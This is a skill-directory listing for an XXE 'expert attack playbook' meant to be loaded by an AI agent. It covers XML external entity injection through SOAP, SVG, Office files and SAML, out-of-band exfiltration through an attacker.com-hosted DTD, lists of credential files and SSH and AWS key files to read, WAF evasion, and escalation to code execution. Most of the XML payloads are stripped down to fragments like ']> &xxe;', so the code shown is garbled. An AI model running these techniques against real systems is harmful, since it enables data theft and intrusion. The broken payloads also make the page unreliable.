---
id: gh-xxe-xml-external-entity
name: "xxe-xml-external-entity"
url: https://skills.yangsir.net/skill/gh-xxe-xml-external-entity
author: yaklang
domain: security
tags: ["penetration-testing", "xxe", "xml-security", "vulnerability-assessment", "cybersecurity"]
install_count: 1100
rating: 4.30 (120 reviews)
github: https://github.com/yaklang/hack-skills/tree/main/skills/xxe-xml-external-entity
---

# xxe-xml-external-entity

> This skill provides an expert-level attack guide for XML External Entity injection (XXE) vulnerabilities. It covers a range of injection contexts (SOAP, REST, Office files, SVG) as well as out-of-band data exfiltration and blind detection techniques. It helps security researchers and penetration testers identify and exploit XXE vulnerabilities, uncovering potential data leaks or server-side request forgery (SSRF) risks and strengthening web application security assessments.

**Stats**: 1,100 installs · 4.3/5 (120 reviews)

## Before / After Comparison

### XXE vulnerability discovery and verification efficiency

**Before**: Without this skill, manually testing for XXE means spending a lot of time trying different XML parsers and contexts. Blind cases, and cases that need out-of-band exfiltration, are especially hard to find or verify, so assessments are slow and key risks are easily missed.

**After**: This skill guides users systematically through identifying and exploiting XXE vulnerabilities, with multiple attack payloads and data exfiltration methods, and significantly shortens discovery and verification time. Penetration tests stay efficient even in complex or blind scenarios, helping ensure that critical data is not leaked through XXE and improving the coverage and accuracy of the assessment.

| Metric | Before | After | Change |
|---|---|---|---|
| Vulnerability discovery time | 240 min | 30 min | -87% |

## Readme

# SKILL: XML External Entity Injection (XXE) - Expert Attack Playbook

> **AI LOAD INSTRUCTION**: Expert XXE techniques. Covers all injection contexts (SOAP, REST JSON→XML parsers, Office files, SVG), OOB exfiltration (critical when direct read fails), blind XXE detection, and XXE-to-SSRF chain. Base models often miss OOB and non-XML context XXE. For real-world CVE chains, Office docx XXE step-by-step, PHP expect:// RCE, and Solr XXE+RCE, load the companion [SCENARIOS.md](./SCENARIOS.md).

## 0. RELATED ROUTING

Also load:

- [upload insecure files](../upload-insecure-files/SKILL.md) when XXE is reachable through SVG, OOXML, import, or preview pipelines

### Extended Scenarios

Also load [SCENARIOS.md](./SCENARIOS.md) when you need:

- Apache Solr XXE + RCE chain (CVE-2017-12629): XXE to read config, then VelocityResponseWriter for RCE
- Office docx XXE step-by-step: unzip → inject DOCTYPE into `word/document.xml` or `[Content_Types].xml` → repackage → upload
- DOCTYPE-based blind SSRF: `PUBLIC` external DTD reference triggers HTTP callback without entity reflection
- PHP `expect://` protocol via XXE: direct command execution when expect extension is installed
- Blind XXE via error messages: force file path error that leaks content in exception text
- XXE in SOAP web services: inject entities into SOAP Envelope/Body elements

---

## 1. CLASSIC XXE PAYLOAD

```xml
]> &xxe;
```

If `/etc/passwd` reflects in response → confirmed file read.

---

## 2. ATTACK SURFACE DISCOVERY

### Direct XML Inputs

- SOAP endpoints (`text/xml`, `application/soap+xml`)
- REST APIs accepting `application/xml`
- File upload: `.xlsx`, `.docx`, `.pptx` (Office Open XML)
- SVG uploads (SVG is XML)
- RSS/Atom feed parsers
- Web services with XML config import

### Non-Obvious XML Processing

Change `Content-Type` header on **any** JSON POST to:

```
Content-Type: application/xml
```

Then rewrite body as XML. Many backends use dual-format parsers or auto-detect.

### PDF Generators

Some HTML→PDF tools (wkhtmltopdf, PrinceXML) fetch embedded URLs, which is an SSRF vector, and also parse external entities in SVG/XML included in the HTML.

---

## 3. OOB (OUT-OF-BAND) XXE - CRITICAL

Use when direct entity reflection fails (server parses but doesn't echo entity content):

### Step 1: Blind detection

```xml
]> &xxe;
```

DNS/HTTP hit to collaborator → confirms XXE (even if no file content returned).
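
Confirming the hit depends on tying a callback to the probe that caused it. A minimal sketch of that bookkeeping, assuming each probe embeds a unique token (as a subdomain label or URL path segment) and that the listener's log is available as plain text lines. The helper names `new_probe_token` and `find_callbacks`, the `oob.example.test` domain, and the log format are all hypothetical and not part of any tool named in this playbook.

```python
import secrets


def new_probe_token(nbytes: int = 8) -> str:
    """Return a random lowercase hex token, safe to use as a DNS label or URL path segment."""
    return secrets.token_hex(nbytes)


def find_callbacks(log_lines, token):
    """Return the log lines that mention the token.

    Matching is case-insensitive because DNS names are case-insensitive
    and resolvers may change the case of a queried name.
    """
    needle = token.lower()
    return [line for line in log_lines if needle in line.lower()]


# Illustrative log lines only; the format is invented for this example.
sample_log = [
    "2024-01-01T00:00:00Z dns A abc123.oob.example.test from 203.0.113.5",
    "2024-01-01T00:00:01Z http GET /favicon.ico from 198.51.100.7",
]

# One token per probe lets a late or indirect callback be matched to its request.
hits = find_callbacks(sample_log, "ABC123")
```

Using a fresh token for every request keeps unrelated scanner noise on the listener from being mistaken for a confirmed hit.
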
### Step 2: OOB file exfiltration via attacker-hosted DTD

**Attacker's server hosts a malicious DTD** at `http://attacker.com/evil.dtd`:

```xml
"> %exfil;
```

**Payload sent to target**:

```xml
%dtd; ]> &exfiltrate;
```

File contents appear in attacker's HTTP server request log.

### Step 3: Error-based OOB (alternative when HTTP blocked)

Use an intentional error to leak data in the error message:

```xml
"> %eval; %error;
```

---

## 4. XXE FILE READ TARGETS

**Linux**:

```
/etc/passwd
/etc/shadow (requires root)
/etc/hosts
/proc/self/environ ← environment variables (DB creds, API keys)
/proc/self/cmdline ← process command line
/var/log/apache2/access.log ← may contain passwords in URLs
/home/USER/.ssh/id_rsa ← SSH private key
/home/USER/.aws/credentials ← AWS keys
/home/USER/.bash_history
```

**Windows**:

```
C:\Windows\System32\drivers\etc\hosts
C:\inetpub\wwwroot\web.config ← ASP.NET connection strings
C:\xampp\htdocs\wp-config.php ← WordPress DB credentials
C:\Users\Administrator\.ssh\id_rsa
```

---

## 5. SVG XXE (file upload context)

When SVG uploads are accepted and served/processed:

```xml
]>
```

Upload as `.svg` → `GET /uploads/file.svg` → file contents in response.

---

## 6. OFFICE FILE XXE (docx/xlsx/pptx)

Office files are ZIP archives containing XML. Inject into `[Content_Types].xml` or `word/document.xml`:

```bash
# Step 1: extract
unzip original.docx -d extracted/
# Step 2: edit word/document.xml and add malicious DTD
# Add after :
# ]>
# Then use &xxe; inside document text
# Step 3: repackage
cd extracted && zip -r ../malicious.docx .
```

---

## 7. SOAP ENDPOINT XXE

SOAP requests parse XML by definition. Inject an external entity into the SOAP envelope:

```xml
]> &xxe;
```

---

## 8. XXE → SSRF CHAIN

An XXE external entity can point to internal HTTP endpoints (identical to SSRF):

```xml
]> &xxe;
```

This combines XXE file read + SSRF into a single payload.

---

## 9. XInclude ATTACK

When the server processes XInclude (importing XML from another source) but you can't control the DOCTYPE:

```xml
```

Works in: Apache Cocoon, Xerces-J, libxml2 with XInclude support enabled.

---

## 10. PROTOCOL HANDLERS IN XXE

```xml
```

---

## 11. BYPASSING DEFENSES

### Parser blocks DOCTYPE

Try XInclude (no DOCTYPE needed, see §9).

### Only allows specific XML schemas

If schema validation occurs: inject comments or CDATA after schema validation but before entity processing.

### Response encoding issues (binary in response)

Use PHP filter for base64:

```xml
```

### Network restrictions on OOB

Use DNS-only OOB via `SYSTEM "file://HASH.attacker.com"`. No HTTP is required; the DNS lookup leaks the data.

---

## 12. QUICK DETECTION CHECKLIST

```
□ Find XML input point (or JSON→XML transformation)
□ Send basic entity: → &xxe; in body → does "test" reflect?
□ If yes → file read: SYSTEM "file:///etc/passwd"
□ If no reflection → OOB test via Collaborator URL
□ If OOB hit → set up attacker DTD for file exfiltration
□ Try SVG upload with XXE
□ Try Content-Type: application/xml on JSON endpoints
□ Try XInclude if DOCTYPE-based fails
```

---

## 13. LOCAL DTD INJECTION (BLIND XXE AMPLIFICATION)

When external entities are blocked but local DTD files exist on the server:

### Technique

```xml
"> %eval; %error; '> %local_dtd; ]>
```

### Common Local DTD Paths

#### Linux

```
/usr/share/yelp/dtd/docbookx.dtd # GNOME Help
/usr/share/xml/fontconfig/fonts.dtd # Fontconfig
/usr/share/sgml/docbook/xml-dtd-*/docbookx.dtd
/usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd
/opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd
/usr/share/struts/struts-config_1_0.dtd # Apache Struts
/usr/share/nmap/nmap.dtd # Nmap
/opt/zaproxy/xml/alert.dtd # OWASP ZAP
```

#### Windows

```
C:\Windows\System32\wbem\xml\cim20.dtd # WMI
C:\Windows\System32\wbem\xml\wmi20.dtd # WMI
C:\Program Files\IBM\WebSphere\*.dtd # WebSphere
C:\Program Files (x86)\Lotus\*.dtd # Lotus Notes
```

#### Inside JAR Files (Java Applications)

```
jar:file:///usr/share/java/tomcat-*.jar!/javax/servlet/resources/web-app_2_3.dtd
jar:file:///opt/wildfly/modules/*.jar!/org/jboss/as/*.dtd
jar:file:///usr/share/java/struts2-core-*.jar!/struts-2.5.dtd
```

### Why This Works

- External connections blocked (firewall/WAF/egress filter)
- But file:// to LOCAL files is usually allowed
- Local DTD is trusted → entity overrides inject attacker-controlled definitions
- Error messages or blind extraction via file:// still works

---

## 14. ADDITIONAL OOB EXFILTRATION CHANNELS

### FTP-based exfiltration (line-by-line)

FTP sends data line by line, which makes it useful for multi-line file exfiltration when HTTP-based OOB truncates at newlines:

```xml
"> %exfil; %send;
```

Run a rogue FTP server (e.g., `xxeserv` or custom Python) on port 2121. Each line of the file arrives as a separate `RETR` or `CWD` command.

### HTTP parameter exfiltration

```xml
"> %exfil; %send;
```

Base64 encoding avoids newline/special-character issues in the HTTP URL. Decode the `d=` parameter on the attacker server.

---

## 15. DTD NESTING TRICKS - PARAMETER ENTITY CHAINING

### Parameter entity within parameter entity

Used to bypass parsers that block direct entity references in entity values:

```xml
%a; ]>
```

The parser expands `%a;` → `%b;` → fetches external DTD. Some WAFs only inspect the first level of entity definitions.

### Triple-nested for filter evasion

```xml
%s2; "> %s3; %exfil;
```

The payload sent to the target only references `stage1.dtd`. The actual file read happens two DTD fetches deep, evading shallow WAF inspection.

---

## 16. XXE IN NON-OBVIOUS FORMATS

| Format | XML Location | Injection Point |
|--------|-------------|-----------------|
| **SOAP Envelope** | Entire body is XML | Add DOCTYPE before `` |
| **SVG Image** | SVG is XML | `]>` in SVG header |
| **OOXML (.docx)** | `word/document.xml`, `[Content_Types].xml` | Inject DOCTYPE + entity into any XML member |
| **OOXML (.xlsx)** | `xl/sharedStrings.xml`, `xl/worksheets/sheet1.xml` | Entity reference in cell values |
| **RSS/Atom feeds** | Feed body is XML | Inject into feed items if user content is included |
| **SAML assertions** | SAML XML tokens | DOCTYPE injection in `SAMLResponse` parameter (base64-decoded XML) |
| **XMPP** | Protocol messages are XML stanzas | Entity in message body or JID fields |
| **GPX files** | GPS track data in XML | Via file upload endpoints accepting GPX |
| **XHTML** | Strict XHTML is valid XML | DOCTYPE injection in XHTML documents |

### SAML XXE

```xml
]> &xxe;
```

Re-encode to base64, submit as `SAMLResponse` parameter.

---

## 17. XXE VIA FILE UPLOAD

### SVG upload

```xml
]>
```

Upload as avatar/image → view uploaded SVG → file content rendered as text.

### XLSX (Excel) upload

```bash
# 1. Create minimal .xlsx, unzip it
unzip report.xlsx -d xlsx_tmp/
# 2. Inject into xl/sharedStrings.xml
# Add after XML declaration:
# ]>
# Replace a element content with &xxe;
# 3. Repackage
cd xlsx_tmp && zip -r ../malicious.xlsx .
```

Alternatively inject into `[Content_Types].xml` (parsed first by most OOXML processors).

### DOCX upload

```bash
# Target: word/document.xml
# Same approach: unzip → inject DOCTYPE + entity → repackage
# Alternative: inject into customXml/item1.xml if custom XML parts exist
```

### Processing pipeline attack

Even if the uploaded file is not directly rendered, the server-side parser (Apache POI, python-docx, OpenXML SDK) may process entities during import, triggering OOB exfiltration.

---

## 18. ERROR-BASED XXE

Force the XML parser to generate an error message containing file content:

### Method 1: Non-existent file reference

```xml
"> %eval; %error;
```

The parser attempts to open `file:///nonexistent/` → error message includes the hostname value.

### Method 2: XML schema validation error

```xml
"> %eval; %err; ]>
```

The `jar:` protocol handler generates verbose error messages that include the expanded entity value.

### Method 3: Integer overflow / type error

```xml
"> %int; %trick;
```

The parser tries to open a file path containing the target file content → error message reveals content.

---

## 19. XSLT INJECTION CONNECTION TO XXE

XSLT processors parse XML and can be chained with XXE:

### XSLT file read

```xml

```

### XSLT RCE (processor-dependent)

```xml

```

### XXE → XSLT chain

If the target accepts XML input with a stylesheet reference (``), inject both an external entity and a malicious XSLT to escalate from file read to RCE.

---

*Source: https://skills.yangsir.net/skill/gh-xxe-xml-external-entity*

*Markdown mirror: https://skills.yangsir.net/api/skill/gh-xxe-xml-external-entity/markdown*